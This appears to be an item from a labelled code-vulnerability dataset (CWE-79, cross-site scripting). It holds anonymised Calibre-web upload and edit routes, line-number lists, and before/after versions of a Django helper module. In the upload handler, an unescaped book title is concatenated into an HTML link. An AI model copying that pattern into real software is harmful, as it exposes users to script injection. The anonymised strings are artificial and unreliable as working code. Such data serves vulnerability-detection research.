            # Fix: the original passed the undefined name `entry`; the
            # matching book is VAR_95.
            flash(_(u"Uploaded VAR_16 probably exists in the library, consider to VAR_63 before VAR_25 new: ")
                  + Markup(render_title_template('book_exists_flash.html', VAR_95=VAR_95)), category="warning")
    VAR_62 = VAR_37.split('&')
    VAR_62 = list(map(lambda it: it.strip().replace(',', '|'), VAR_62))
    VAR_62 = helper.uniq(VAR_62)
    if VAR_62 == ['']:
        VAR_62 = [_(u'Unknown')]  # prevent empty Author
    VAR_64 = list()
    VAR_69 = None
    for inp in VAR_62:
        VAR_89 = calibre_db.session.query(db.Authors).filter(db.Authors.name == inp).first()
        if not VAR_89:
            if not VAR_69:
                # Fix: the original assigned to the undefined name
                # `db_author`, leaving VAR_69 as None and adding None to the
                # session; the new author must be bound to VAR_69.
                VAR_69 = db.Authors(inp, helper.get_sorted_author(inp), "")
                calibre_db.session.add(VAR_69)
                calibre_db.session.commit()
            VAR_113 = helper.get_sorted_author(inp)
        else:
            if not VAR_69:
                # Fix: same undefined-name bug for an existing author.
                VAR_69 = VAR_89
            VAR_113 = VAR_89.sort
        VAR_64.append(VAR_113)
    VAR_65 = ' & '.join(VAR_64)
    return VAR_65, VAR_62, VAR_69
def FUNC_33(VAR_38, VAR_35):
    """Create the db.Books record (plus its first db.Data row) for an upload.

    VAR_35 is the uploader metadata (title, author, cover, tags, ...).
    Returns (new_book, author_name_list, valid_title_filename).
    """
    VAR_36 = VAR_35.title
    VAR_37 = VAR_35.author
    VAR_65, VAR_62, VAR_69 = FUNC_32(VAR_36, VAR_37)
    VAR_70 = helper.get_valid_filename(VAR_36)
    VAR_71 = helper.get_valid_filename(VAR_69.name)
    # Library-relative path "<author>/<title>", always with forward slashes.
    VAR_72 = os.path.join(VAR_71, VAR_70).replace('\\', '/')
    VAR_40 = db.Books(VAR_36, "", VAR_65, datetime.utcnow(), datetime(101, 1, 1),
                      '1', datetime.utcnow(), VAR_72, VAR_35.cover, VAR_69, [], "")
    VAR_38 |= FUNC_7(VAR_62, VAR_40.authors, db.Authors, calibre_db.session,
                     'author')
    VAR_38 |= FUNC_18(VAR_35.series_id, VAR_40)
    VAR_38 |= FUNC_20(VAR_35.languages, VAR_40, VAR_25=True)
    VAR_38 |= FUNC_16(VAR_35.tags, VAR_40)
    VAR_38 |= FUNC_21(VAR_35.publisher, VAR_40)
    VAR_38 |= FUNC_17(VAR_35.series, VAR_40)
    VAR_73 = os.path.getsize(VAR_35.file_path)
    VAR_74 = db.Data(VAR_40, VAR_35.extension.upper()[1:], VAR_73, VAR_70)
    VAR_40.data.append(VAR_74)
    calibre_db.session.add(VAR_40)
    # Flush (not commit) so the new book gets its id before further steps.
    calibre_db.session.flush()
    return VAR_40, VAR_62, VAR_70
def FUNC_34(VAR_39):
    """Validate an uploaded file's extension and hand it to the uploader.

    Returns (metadata, None) on success or (None, error_response) when the
    extension is missing/forbidden or the file cannot be stored.
    """
    def _index_response():
        return Response(json.dumps({"location": url_for("web.index")}),
                        mimetype='application/json')

    if '.' not in VAR_39.filename:
        flash(_('File to be uploaded must have an extension'), category="error")
        return None, _index_response()
    extension = VAR_39.filename.rsplit('.', 1)[-1].lower()
    if extension not in constants.EXTENSIONS_UPLOAD and '' not in constants.EXTENSIONS_UPLOAD:
        flash(
            _("File extension '%(ext)s' is not allowed to be uploaded to this server",
              ext=extension), category="error")
        return None, _index_response()
    try:
        book_meta = uploader.upload(VAR_39, config.config_rarfile_location)
    except (IOError, OSError):
        VAR_1.error("File %s could not saved to temp dir", VAR_39.filename)
        flash(_(u"File %(filename)s could not saved to temp dir",
                filename=VAR_39.filename), category="error")
        return None, _index_response()
    return book_meta, None
def FUNC_35(VAR_35, VAR_40):
    """Copy the uploaded cover (or the generic one) into the new book's folder."""
    source_cover = VAR_35.cover or os.path.join(constants.STATIC_DIR, 'generic_cover.jpg')
    target_cover = os.path.join(config.config_calibre_dir, VAR_40.path, "cover.jpg")
    try:
        copyfile(source_cover, target_cover)
        # Remove the temporary file only when a cover was actually uploaded.
        if VAR_35.cover:
            os.unlink(VAR_35.cover)
    except OSError as e:
        VAR_1.error("Failed to move cover file %s: %s", target_cover, e)
        flash(_(u"Failed to Move Cover File %(file)s: %(VAR_49)s", file=target_cover,
                VAR_49=e),
              category="error")
@VAR_0.route("/upload", methods=["GET", "POST"])
@login_required_if_no_ano
@FUNC_0
def VAR_25():
    """Handle the multi-file book upload form; responds with JSON locations."""
    if not config.config_uploading:
        abort(404)
    if VAR_31.method == 'POST' and 'btn-upload' in VAR_31.files:
        for VAR_39 in VAR_31.files.getlist("btn-upload"):
            try:
                VAR_38 = False
                calibre_db.update_title_sort(config)
                calibre_db.session.connection().connection.connection.create_function('uuid4', 0, lambda: str(uuid4()))
                VAR_35, VAR_49 = FUNC_34(VAR_39)
                if VAR_49:
                    return VAR_49
                VAR_40, VAR_62, VAR_70 = FUNC_33(VAR_38, VAR_35)
                VAR_38 |= FUNC_19(Markup(VAR_35.description).unescape(), VAR_40)
                VAR_14 = VAR_40.id
                VAR_36 = VAR_40.title
                VAR_49 = helper.update_dir_structure_file(VAR_14,
                                                          config.config_calibre_dir,
                                                          VAR_62[0],
                                                          VAR_35.file_path,
                                                          VAR_70 + VAR_35.extension.lower())
                FUNC_35(VAR_35, VAR_40)
                calibre_db.session.commit()
                if config.config_use_google_drive:
                    gdriveutils.updateGdriveCalibreFromLocal()
                if VAR_49:
                    flash(VAR_49, category="error")
                VAR_110=_(u"File %(file)s uploaded", file=VAR_36)
                # Fix: the original referenced the undefined name `book_id`
                # in the url_for() calls below; the new book's id is VAR_14.
                WorkerThread.add(current_user.name, TaskUpload(
                    "<a href=\"" + url_for('web.show_book', VAR_14=VAR_14) + "\">" + VAR_110 + "</a>"))
                if len(VAR_31.files.getlist("btn-upload")) < 2:
                    if current_user.role_edit() or current_user.role_admin():
                        VAR_120 = {"location": url_for('editbook.edit_book', VAR_14=VAR_14)}
                        return Response(json.dumps(VAR_120), mimetype='application/json')
                    else:
                        VAR_120 = {"location": url_for('web.show_book', VAR_14=VAR_14)}
                        return Response(json.dumps(VAR_120), mimetype='application/json')
            except (OperationalError, IntegrityError) as e:
                calibre_db.session.rollback()
                VAR_1.error("Database VAR_49: %s", e)
                flash(_(u"Database VAR_49: %(VAR_49)s.", VAR_49=e), category="error")
        return Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
@VAR_0.route("/admin/VAR_16/convert/<int:VAR_14>", methods=['POST'])
@login_required_if_no_ano
@FUNC_1
def FUNC_37(VAR_14):
    """Queue a format conversion for book VAR_14 (form: book_format_from/_to)."""
    VAR_76 = VAR_31.form.get('book_format_from', None)
    VAR_77 = VAR_31.form.get('book_format_to', None)
    if (VAR_76 is None) or (VAR_77 is None):
        flash(_(u"Source or destination format for conversion missing"), category="error")
        # Fix: the original referenced the undefined name `book_id`;
        # the route parameter is VAR_14.
        return redirect(url_for('editbook.edit_book', VAR_14=VAR_14))
    VAR_1.info('converting: VAR_16 id: %s from: %s to: %s', VAR_14, VAR_76, VAR_77)
    VAR_78 = helper.convert_book_format(VAR_14, config.config_calibre_dir, VAR_76.upper(),
                                        VAR_77.upper(), current_user.name)
    if VAR_78 is None:
        flash(_(u"Book successfully queued for converting to %(VAR_15)s",
                VAR_15=VAR_77),
              category="success")
    else:
        flash(_(u"There was an VAR_49 converting this VAR_16: %(res)s", res=VAR_78), category="error")
    return redirect(url_for('editbook.edit_book', VAR_14=VAR_14))
@VAR_0.route("/scholarsearch/<VAR_41>",methods=['GET'])
@login_required_if_no_ano
@FUNC_1
def FUNC_38(VAR_41):
    """Search Google Scholar for VAR_41 ('+'-separated terms).

    Returns at most 10 publications as JSON, or "[]" when the scholarly
    integration is unavailable.
    """
    if not VAR_45:
        return "[]"
    publications = scholarly.search_pubs(' '.join(VAR_41.split('+')))
    results = []
    for publication in publications:
        # The 'source' entry is not JSON serializable; drop it.
        del publication['source']
        results.append(publication)
        if len(results) >= 10:
            break
    return Response(json.dumps(results), mimetype='application/json')
@VAR_0.route("/ajax/editbooks/<VAR_42>", methods=['POST'])
@login_required_if_no_ano
@FUNC_1
def FUNC_39(VAR_42):
    """Inline-edit a single field of a book (x-editable ajax endpoint).

    VAR_42 selects the field; the form supplies 'pk' (book id) and 'value'.
    Returns a JSON Response describing the new value, or "" for unknown fields.
    """
    VAR_79 = VAR_31.form.to_dict()
    VAR_16 = calibre_db.get_book(VAR_79['pk'])
    VAR_80 = ""
    if VAR_42 =='series_index':
        FUNC_18(VAR_79['value'], VAR_16)
        VAR_80 = Response(json.dumps({'success': True, 'newValue': VAR_16.series_index}), mimetype='application/json')
    elif VAR_42 =='tags':
        FUNC_16(VAR_79['value'], VAR_16)
        VAR_80 = Response(json.dumps({'success': True, 'newValue': ', '.join([tag.name for tag in VAR_16.tags])}),
                          mimetype='application/json')
    elif VAR_42 =='series':
        FUNC_17(VAR_79['value'], VAR_16)
        VAR_80 = Response(json.dumps({'success': True, 'newValue': ', '.join([serie.name for serie in VAR_16.series])}),
                          mimetype='application/json')
    elif VAR_42 =='publishers':
        FUNC_21(VAR_79['value'], VAR_16)
        VAR_80 = Response(json.dumps({'success': True,
                                      'newValue': ', '.join([VAR_86.name for VAR_86 in VAR_16.publishers])}),
                          mimetype='application/json')
    elif VAR_42 =='languages':
        VAR_26 = list()
        # Fix: the original passed the undefined name `invalid`; the
        # collector list is VAR_26.
        FUNC_20(VAR_79['value'], VAR_16, VAR_26=VAR_26)
        if VAR_26:
            VAR_80 = Response(json.dumps({'success': False,
                                          'msg': 'Invalid VAR_24 in VAR_31: {}'.format(','.join(VAR_26))}),
                              mimetype='application/json')
        else:
            VAR_121 = list()
            for lang in VAR_16.languages:
                try:
                    VAR_121.append(LC.parse(lang.lang_code).get_language_name(get_locale()))
                except UnknownLocaleError:
                    VAR_121.append(_(isoLanguages.get(part3=lang.lang_code).name))
            VAR_80 = Response(json.dumps({'success': True, 'newValue': ', '.join(VAR_121)}),
                              mimetype='application/json')
    elif VAR_42 =='author_sort':
        VAR_16.author_sort = VAR_79['value']
        VAR_80 = Response(json.dumps({'success': True, 'newValue': VAR_16.author_sort}),
                          mimetype='application/json')
    elif VAR_42 == 'title':
        VAR_124 = VAR_16.sort
        FUNC_27(VAR_16, VAR_79.get('value', ""))
        helper.update_dir_stucture(VAR_16.id, config.config_calibre_dir)
        VAR_80 = Response(json.dumps({'success': True, 'newValue': VAR_16.title}),
                          mimetype='application/json')
    elif VAR_42 =='sort':
        VAR_16.sort = VAR_79['value']
        VAR_80 = Response(json.dumps({'success': True, 'newValue': VAR_16.sort}),
                          mimetype='application/json')
    elif VAR_42 =='authors':
        VAR_62, VAR_125 = FUNC_28(VAR_16, VAR_79['value'], VAR_79.get('checkA', None) == "true")
        helper.update_dir_stucture(VAR_16.id, config.config_calibre_dir, VAR_62[0])
        VAR_80 = Response(json.dumps({'success': True,
                                      'newValue': ' & '.join([author.replace('|',',') for author in VAR_62])}),
                          mimetype='application/json')
    VAR_16.last_modified = datetime.utcnow()
    try:
        calibre_db.session.commit()
        # Restore the previous sort string when the user unchecked
        # "update title sort" for a title edit.
        if VAR_42 == 'title' and VAR_79.get('checkT') == "false":
            VAR_16.sort = VAR_124
            calibre_db.session.commit()
    except (OperationalError, IntegrityError) as e:
        calibre_db.session.rollback()
        VAR_1.error("Database VAR_49: %s", e)
    return VAR_80
@VAR_0.route("/ajax/sort_value/<VAR_43>/<int:VAR_44>")
@login_required
def FUNC_40(VAR_43, VAR_44):
    """Return the sort value for one field of book VAR_44 as JSON ('' when unavailable)."""
    if VAR_43 not in ('title', 'authors', 'sort', 'author_sort'):
        return ""
    VAR_16 = calibre_db.get_filtered_book(VAR_44)
    if not VAR_16:
        return ""
    if VAR_43 == 'title':
        payload = {'sort': VAR_16.sort}
    elif VAR_43 == 'authors':
        payload = {'author_sort': VAR_16.author_sort}
    elif VAR_43 == 'sort':
        payload = {'sort': VAR_16.title}
    else:  # 'author_sort'
        payload = {'author_sort': VAR_16.author}
    return json.dumps(payload)
@VAR_0.route("/ajax/simulatemerge", methods=['POST'])
@login_required
@FUNC_1
def FUNC_41():
    """Preview a merge: return the target title and all source titles as JSON."""
    VAR_79 = VAR_31.get_json().get('Merge_books')
    if VAR_79:
        VAR_100 = calibre_db.get_book(VAR_79[0]).title
        VAR_79.pop(0)
        if VAR_100:
            # Fix: the list was re-created inside the loop, so only the last
            # source title survived (and an empty id list left it unbound).
            VAR_118 = []
            for VAR_14 in VAR_79:
                VAR_118.append(calibre_db.get_book(VAR_14).title)
            return json.dumps({'to': VAR_100, 'from': VAR_118})
    return ""
@VAR_0.route("/ajax/mergebooks", methods=['POST'])
@login_required
@FUNC_1
def FUNC_42():
    """Merge books: copy formats missing from the first (target) book out of
    the remaining source books, then delete each source book.
    """
    VAR_79 = VAR_31.get_json().get('Merge_books')
    VAR_81 = list()
    if VAR_79:
        # The first id is the merge target; the rest are merged into it.
        VAR_100 = calibre_db.get_book(VAR_79[0])
        VAR_79.pop(0)
        if VAR_100:
            for file in VAR_100.data:
                VAR_81.append(file.format)
            VAR_114 = helper.get_valid_filename(VAR_100.title) + ' - ' + \
                      helper.get_valid_filename(VAR_100.authors[0].name)
            for VAR_14 in VAR_79:
                VAR_118 = calibre_db.get_book(VAR_14)
                if VAR_118:
                    for element in VAR_118.data:
                        # Only copy formats the target book does not have yet.
                        if element.format not in VAR_81:
                            VAR_122 = os.path.normpath(os.path.join(config.config_calibre_dir,
                                                                    VAR_100.path,
                                                                    VAR_114 + "." + element.format.lower()))
                            VAR_123 = os.path.normpath(os.path.join(config.config_calibre_dir,
                                                                    VAR_118.path,
                                                                    element.name + "." + element.format.lower()))
                            copyfile(VAR_123, VAR_122)
                            VAR_100.data.append(db.Data(VAR_100.id,
                                                        element.format,
                                                        element.uncompressed_size,
                                                        VAR_114))
                    # Delete the source book after its formats were copied.
                    FUNC_13(VAR_118.id,"", True)
        return json.dumps({'success': True})
    return ""
@VAR_0.route("/ajax/xchange", methods=['POST'])
@login_required
@FUNC_1
def FUNC_43():
    """Swap title and authors for each book id submitted as 'xchange' JSON."""
    VAR_79 = VAR_31.get_json().get('xchange')
    if VAR_79:
        for val in VAR_79:
            VAR_38 = False
            # Fix: VAR_90 was only assigned inside the "changed" branch but
            # read unconditionally below, raising NameError otherwise.
            VAR_90 = None
            VAR_16 = calibre_db.get_book(val)
            VAR_115 = VAR_16.title
            VAR_116 = calibre_db.order_authors(VAR_16)
            VAR_53 = []
            for VAR_37 in VAR_116.authors:
                VAR_53.append(VAR_37.name.replace('|', ','))
            # The old author list becomes the title, the old title the author.
            VAR_91 = FUNC_27(VAR_16, " ".join(VAR_53))
            VAR_62, VAR_92 = FUNC_28(VAR_16, VAR_115)
            if VAR_92 or VAR_91:
                VAR_90 = VAR_16.id
                VAR_38 = True
                if config.config_use_google_drive:
                    gdriveutils.updateGdriveCalibreFromLocal()
            if VAR_90:
                helper.update_dir_stucture(VAR_90, config.config_calibre_dir, VAR_62[0])
            if VAR_38:
                VAR_16.last_modified = datetime.utcnow()
            try:
                calibre_db.session.commit()
            except (OperationalError, IntegrityError) as e:
                calibre_db.session.rollback()
                VAR_1.error("Database VAR_49: %s", e)
                return json.dumps({'success': False})
            if config.config_use_google_drive:
                gdriveutils.updateGdriveCalibreFromLocal()
        return json.dumps({'success': True})
    return ""
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
29,
30,
37,
38,
53,
58,
59,
62,
63,
70,
72,
79,
81,
94,
97,
101,
102,
120,
121,
131,
141,
143,
144,
162,
166,
167,
190,
191,
192,
193,
195,
199,
200,
202,
204,
206,
210,
211,
222,
231,
237,
242,
243,
249,
250,
252,
257,
258,
259,
265,
295,
296,
316,
317,
359,
361,
364,
365,
372,
375,
377,
381,
382,
394,
395,
408,
409,
432,
436,
439,
440,
445,
446,
448,
458,
459,
471,
472,
486,
488,
489,
493,
496,
497,
508,
509,
523,
540,
541,
548,
557,
565,
568,
569,
587,
602,
604,
607,
620,
624,
625,
637,
640,
641,
655,
656,
660,
664,
665,
669,
680,
681,
683,
691,
692,
694,
697,
699,
702,
704,
705,
706,
720,
721,
727,
728,
734,
735,
738,
740,
741,
745,
753,
755,
756,
758,
763,
766,
770,
785,
786,
788,
790,
796,
798,
800,
802,
804,
806,
808,
816,
837,
838,
851,
852,
866,
867,
875,
876,
878,
880,
882,
883,
886,
904,
905,
910,
913,
914,
916,
917,
920,
923,
924,
926,
927,
929,
930,
932,
933,
935,
936,
938,
939,
944,
945,
948,
950,
961,
962,
971,
972,
974,
989,
990,
1001,
1004,
1008,
1010,
1011,
1013,
1016,
1022,
1024,
1025,
1027,
1035,
1048,
1053,
1056,
1060,
1064,
1072,
1090,
1153,
1161,
1162,
1178,
1179,
1194,
1195,
1203,
1216,
1231,
1246,
1252,
1255,
1266,
1271,
213,
214,
215,
854
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
30,
31,
37,
52,
57,
58,
59,
60,
63,
64,
71,
73,
80,
82,
95,
98,
102,
103,
121,
122,
132,
142,
144,
145,
163,
167,
168,
191,
192,
193,
194,
196,
200,
201,
203,
205,
207,
211,
212,
223,
232,
238,
243,
244,
250,
251,
253,
258,
259,
260,
266,
296,
297,
317,
318,
360,
362,
365,
366,
373,
376,
378,
382,
383,
395,
396,
409,
410,
433,
437,
440,
441,
446,
447,
449,
459,
460,
474,
475,
489,
491,
492,
496,
499,
500,
511,
512,
528,
545,
546,
553,
562,
570,
573,
574,
592,
607,
609,
612,
625,
629,
630,
642,
645,
646,
660,
661,
665,
669,
670,
674,
685,
686,
688,
696,
697,
699,
702,
704,
707,
709,
710,
711,
725,
726,
732,
733,
739,
740,
743,
745,
746,
750,
758,
760,
761,
763,
768,
771,
775,
790,
791,
793,
795,
801,
803,
805,
807,
809,
811,
813,
821,
842,
843,
856,
857,
871,
872,
880,
881,
883,
885,
887,
888,
891,
909,
910,
915,
918,
919,
921,
922,
925,
928,
929,
931,
932,
934,
935,
937,
938,
940,
941,
943,
944,
949,
950,
953,
955,
966,
967,
976,
977,
979,
994,
995,
1006,
1009,
1013,
1015,
1016,
1018,
1021,
1027,
1029,
1030,
1032,
1040,
1053,
1058,
1061,
1065,
1069,
1077,
1095,
1158,
1166,
1167,
1183,
1184,
1199,
1200,
1208,
1221,
1236,
1251,
1257,
1260,
1271,
1276,
214,
215,
216,
859
] |
1CWE-79
| import re
import random
import datetime
from django.utils.translation import ugettext as _
from django.utils.translation import ungettext
def get_from_dict_or_object(source, key):
    """Return source[key] when item access works, otherwise the attribute `key`.

    Raises AttributeError when neither form of access yields a value.
    """
    try:
        return source[key]
    except (TypeError, KeyError, IndexError):
        # Fall back to attribute access for plain objects. The original used
        # a bare `except:`, which also swallowed KeyboardInterrupt/SystemExit
        # and hid unrelated errors raised inside __getitem__.
        return getattr(source, key)
def enumerate_string_list(strings):
    """Number the given strings: ('one', 'two') -> ['1) one', '2) two']."""
    return ['%d) %s' % (position, text)
            for position, text in enumerate(strings, start=1)]
def pad_string(text):
    """Collapse internal whitespace to single spaces and surround the result
    with exactly one leading and one trailing space.

    Text containing no words collapses to ''.
    """
    words = text.strip().split()
    if not words:
        return ''
    return ' %s ' % ' '.join(words)
def split_list(text):
    """Split a loosely formatted list (comma, semicolon or whitespace
    separated words) into a list of words.
    """
    for separator in (',', ';'):
        text = text.replace(separator, ' ')
    return text.strip().split()
def is_iterable(thing):
    """Return True when `thing` is iterable; plain strings always count."""
    if hasattr(thing, '__iter__'):
        return True
    # Python 2 `str` has no __iter__, hence the string fallback. Fix: the
    # original referenced `basestring` unconditionally, which raises
    # NameError on Python 3 for any non-iterable argument.
    try:
        string_types = basestring
    except NameError:
        string_types = str
    return isinstance(thing, string_types)
# Heuristic user-agent classifiers used by not_a_robot_request() below.
# Substrings commonly found in crawler/script user-agent strings.
BOT_REGEX = re.compile(
    r'bot|http|\.com|crawl|spider|python|curl|yandex'
)
# Desktop browser signatures (Gecko/KHTML/MSIE/Presto/Trident engines, Opera).
BROWSER_REGEX = re.compile(
    r'^(Mozilla.*(Gecko|KHTML|MSIE|Presto|Trident)|Opera).*$'
)
# Vendor tokens that identify mobile device user agents.
MOBILE_REGEX = re.compile(
    r'(BlackBerry|HTC|LG|MOT|Nokia|NOKIAN|PLAYSTATION|PSP|SAMSUNG|SonyEricsson)'
)
def strip_plus(text):
    """Return text with runs of whitespace collapsed to a single space and
    leading/trailing whitespace removed."""
    # Fix: use a raw string for the regex -- '\s' in a plain literal is an
    # invalid escape sequence (a warning, and eventually an error, on
    # modern Python).
    return re.sub(r'\s+', ' ', text).strip()
def not_a_robot_request(request):
    """Heuristically decide whether `request` comes from a real browser.

    Returns False for requests without an Accept-Language header or a
    user agent, and for agents matching known bot signatures; True for
    agents that look like mobile devices or desktop browsers.
    """
    if 'HTTP_ACCEPT_LANGUAGE' not in request.META:
        return False
    user_agent = request.META.get('HTTP_USER_AGENT', None)
    if user_agent is None:
        return False
    # Fix: compiled Pattern.match() takes a *position* as its second
    # argument, not flags -- passing re.IGNORECASE (== 2) silently started
    # matching at offset 2. Apply the flag via re.match on the pattern.
    if re.match(BOT_REGEX.pattern, user_agent, re.IGNORECASE):
        return False
    if MOBILE_REGEX.match(user_agent):
        return True
    if BROWSER_REGEX.search(user_agent):
        return True
    return False
def diff_date(date, use_on_prefix = False):
    """Return a localized, human readable "how long ago" string for `date`.

    More than two days in the past yields an absolute date (year shown only
    when it differs from the current year), optionally prefixed with "on".
    NOTE(review): compares against naive local time -- confirm callers
    always pass naive local datetimes, otherwise the subtraction raises.
    """
    now = datetime.datetime.now()#datetime(*time.localtime()[0:6])#???
    diff = now - date
    days = diff.days
    # timedelta.seconds only holds the sub-day remainder (0..86399).
    hours = int(diff.seconds/3600)
    minutes = int(diff.seconds/60)
    if days > 2:
        if date.year == now.year:
            date_token = date.strftime("%b %d")
        else:
            date_token = date.strftime("%b %d '%y")
        if use_on_prefix:
            return _('on %(date)s') % { 'date': date_token }
        else:
            return date_token
    elif days == 2:
        return _('2 days ago')
    elif days == 1:
        return _('yesterday')
    elif minutes >= 60:
        return ungettext(
            '%(hr)d hour ago',
            '%(hr)d hours ago',
            hours
        ) % {'hr':hours}
    else:
        return ungettext(
            '%(min)d min ago',
            '%(min)d mins ago',
            minutes
        ) % {'min':minutes}
#todo: this function may need to be removed to simplify the paginator functionality
# Paginator tuning knobs (consumed by setup_paginator):
# number of page links shown when the current page is near the start/end,
LEADING_PAGE_RANGE_DISPLAYED = TRAILING_PAGE_RANGE_DISPLAYED = 5
# current-page thresholds for counting as "near" the start/end,
LEADING_PAGE_RANGE = TRAILING_PAGE_RANGE = 4
# page numbers shown beyond the ellipsis at the far end,
NUM_PAGES_OUTSIDE_RANGE = 1
# and neighbours shown on each side of the current page.
ADJACENT_PAGES = 2
def setup_paginator(context):
"""
custom paginator tag
Inspired from http://blog.localkinegrinds.com/2007/09/06/digg-style-pagination-in-django/
"""
if (context["is_paginated"]):
" Initialize variables "
in_leading_range = in_trailing_range = False
pages_outside_leading_range = pages_outside_trailing_range = range(0)
if (context["pages"] <= LEADING_PAGE_RANGE_DISPLAYED):
in_leading_range = in_trailing_range = True
page_numbers = [n for n in range(1, context["pages"] + 1) if n > 0 and n <= context["pages"]]
elif (context["current_page_number"] <= LEADING_PAGE_RANGE):
in_leading_range = True
page_numbers = [n for n in range(1, LEADING_PAGE_RANGE_DISPLAYED + 1) if n > 0 and n <= context["pages"]]
pages_outside_leading_range = [n + context["pages"] for n in range(0, -NUM_PAGES_OUTSIDE_RANGE, -1)]
elif (context["current_page_number"] > context["pages"] - TRAILING_PAGE_RANGE):
in_trailing_range = True
page_numbers = [n for n in range(context["pages"] - TRAILING_PAGE_RANGE_DISPLAYED + 1, context["pages"] + 1) if n > 0 and n <= context["pages"]]
pages_outside_trailing_range = [n + 1 for n in range(0, NUM_PAGES_OUTSIDE_RANGE)]
else:
page_numbers = [n for n in range(context["current_page_number"] - ADJACENT_PAGES, context["current_page_number"] + ADJACENT_PAGES + 1) if n > 0 and n <= context["pages"]]
pages_outside_leading_range = [n + context["pages"] for n in range(0, -NUM_PAGES_OUTSIDE_RANGE, -1)]
pages_outside_trailing_range = [n + 1 for n in range(0, NUM_PAGES_OUTSIDE_RANGE)]
page_object = context['page_object']
#patch for change in django 1.5
if page_object.has_previous():
previous_page_number = page_object.previous_page_number()
else:
previous_page_number = None
if page_object.has_next():
next_page_number = page_object.next_page_number()
else:
next_page_number = None
return {
"base_url": context["base_url"],
"is_paginated": context["is_paginated"],
"previous": previous_page_number,
"has_previous": page_object.has_previous(),
"next": next_page_number,
"has_next": page_object.has_next(),
"page": context["current_page_number"],
"pages": context["pages"],
"page_numbers": page_numbers,
"in_leading_range" : in_leading_range,
"in_trailing_range" : in_trailing_range,
"pages_outside_leading_range": pages_outside_leading_range,
"pages_outside_trailing_range": pages_outside_trailing_range,
}
def get_admin():
"""Returns an admin users, usefull for raising flags"""
try:
from django.contrib.auth.models import User
return User.objects.filter(is_superuser=True)[0]
except:
raise Exception('there is no admin users')
def generate_random_key(length=16):
"""return random string, length is number of characters"""
random.seed()
assert(isinstance(length, int))
format_string = '%0' + str(2*length) + 'x'
return format_string % random.getrandbits(length*8)
| import re
import random
import datetime
from django.utils.translation import ugettext as _
from django.utils.translation import ungettext
from django.utils.html import escape
def get_from_dict_or_object(source, key):
try:
return source[key]
except:
return getattr(source, key)
def enumerate_string_list(strings):
"""for a list or a tuple ('one', 'two',) return
a list formatted as ['1) one', '2) two',]
"""
numbered_strings = enumerate(strings, start = 1)
return [ '%d) %s' % item for item in numbered_strings ]
def pad_string(text):
"""Inserts one space between words,
including one space before the first word
and after the last word.
String without words is collapsed to ''
"""
words = text.strip().split()
if len(words) > 0:
return ' ' + ' '.join(words) + ' '
else:
return ''
def split_list(text):
"""Takes text, representing a loosely formatted
list (comma, semicolon, empty space separated
words) and returns a list() of words.
"""
text = text.replace(',', ' ').replace(';', ' ')
return text.strip().split()
def is_iterable(thing):
if hasattr(thing, '__iter__'):
return True
else:
return isinstance(thing, basestring)
BOT_REGEX = re.compile(
r'bot|http|\.com|crawl|spider|python|curl|yandex'
)
BROWSER_REGEX = re.compile(
r'^(Mozilla.*(Gecko|KHTML|MSIE|Presto|Trident)|Opera).*$'
)
MOBILE_REGEX = re.compile(
r'(BlackBerry|HTC|LG|MOT|Nokia|NOKIAN|PLAYSTATION|PSP|SAMSUNG|SonyEricsson)'
)
def strip_plus(text):
"""returns text with redundant spaces replaced with just one,
and stripped leading and the trailing spaces"""
return re.sub('\s+', ' ', text).strip()
def not_a_robot_request(request):
if 'HTTP_ACCEPT_LANGUAGE' not in request.META:
return False
user_agent = request.META.get('HTTP_USER_AGENT', None)
if user_agent is None:
return False
if BOT_REGEX.match(user_agent, re.IGNORECASE):
return False
if MOBILE_REGEX.match(user_agent):
return True
if BROWSER_REGEX.search(user_agent):
return True
return False
def diff_date(date, use_on_prefix = False):
now = datetime.datetime.now()#datetime(*time.localtime()[0:6])#???
diff = now - date
days = diff.days
hours = int(diff.seconds/3600)
minutes = int(diff.seconds/60)
if days > 2:
if date.year == now.year:
date_token = date.strftime("%b %d")
else:
date_token = date.strftime("%b %d '%y")
if use_on_prefix:
return _('on %(date)s') % { 'date': date_token }
else:
return date_token
elif days == 2:
return _('2 days ago')
elif days == 1:
return _('yesterday')
elif minutes >= 60:
return ungettext(
'%(hr)d hour ago',
'%(hr)d hours ago',
hours
) % {'hr':hours}
else:
return ungettext(
'%(min)d min ago',
'%(min)d mins ago',
minutes
) % {'min':minutes}
#todo: this function may need to be removed to simplify the paginator functionality
LEADING_PAGE_RANGE_DISPLAYED = TRAILING_PAGE_RANGE_DISPLAYED = 5
LEADING_PAGE_RANGE = TRAILING_PAGE_RANGE = 4
NUM_PAGES_OUTSIDE_RANGE = 1
ADJACENT_PAGES = 2
def setup_paginator(context):
"""
custom paginator tag
Inspired from http://blog.localkinegrinds.com/2007/09/06/digg-style-pagination-in-django/
"""
if (context["is_paginated"]):
" Initialize variables "
in_leading_range = in_trailing_range = False
pages_outside_leading_range = pages_outside_trailing_range = range(0)
if (context["pages"] <= LEADING_PAGE_RANGE_DISPLAYED):
in_leading_range = in_trailing_range = True
page_numbers = [n for n in range(1, context["pages"] + 1) if n > 0 and n <= context["pages"]]
elif (context["current_page_number"] <= LEADING_PAGE_RANGE):
in_leading_range = True
page_numbers = [n for n in range(1, LEADING_PAGE_RANGE_DISPLAYED + 1) if n > 0 and n <= context["pages"]]
pages_outside_leading_range = [n + context["pages"] for n in range(0, -NUM_PAGES_OUTSIDE_RANGE, -1)]
elif (context["current_page_number"] > context["pages"] - TRAILING_PAGE_RANGE):
in_trailing_range = True
page_numbers = [n for n in range(context["pages"] - TRAILING_PAGE_RANGE_DISPLAYED + 1, context["pages"] + 1) if n > 0 and n <= context["pages"]]
pages_outside_trailing_range = [n + 1 for n in range(0, NUM_PAGES_OUTSIDE_RANGE)]
else:
page_numbers = [n for n in range(context["current_page_number"] - ADJACENT_PAGES, context["current_page_number"] + ADJACENT_PAGES + 1) if n > 0 and n <= context["pages"]]
pages_outside_leading_range = [n + context["pages"] for n in range(0, -NUM_PAGES_OUTSIDE_RANGE, -1)]
pages_outside_trailing_range = [n + 1 for n in range(0, NUM_PAGES_OUTSIDE_RANGE)]
page_object = context['page_object']
#patch for change in django 1.5
if page_object.has_previous():
previous_page_number = page_object.previous_page_number()
else:
previous_page_number = None
if page_object.has_next():
next_page_number = page_object.next_page_number()
else:
next_page_number = None
return {
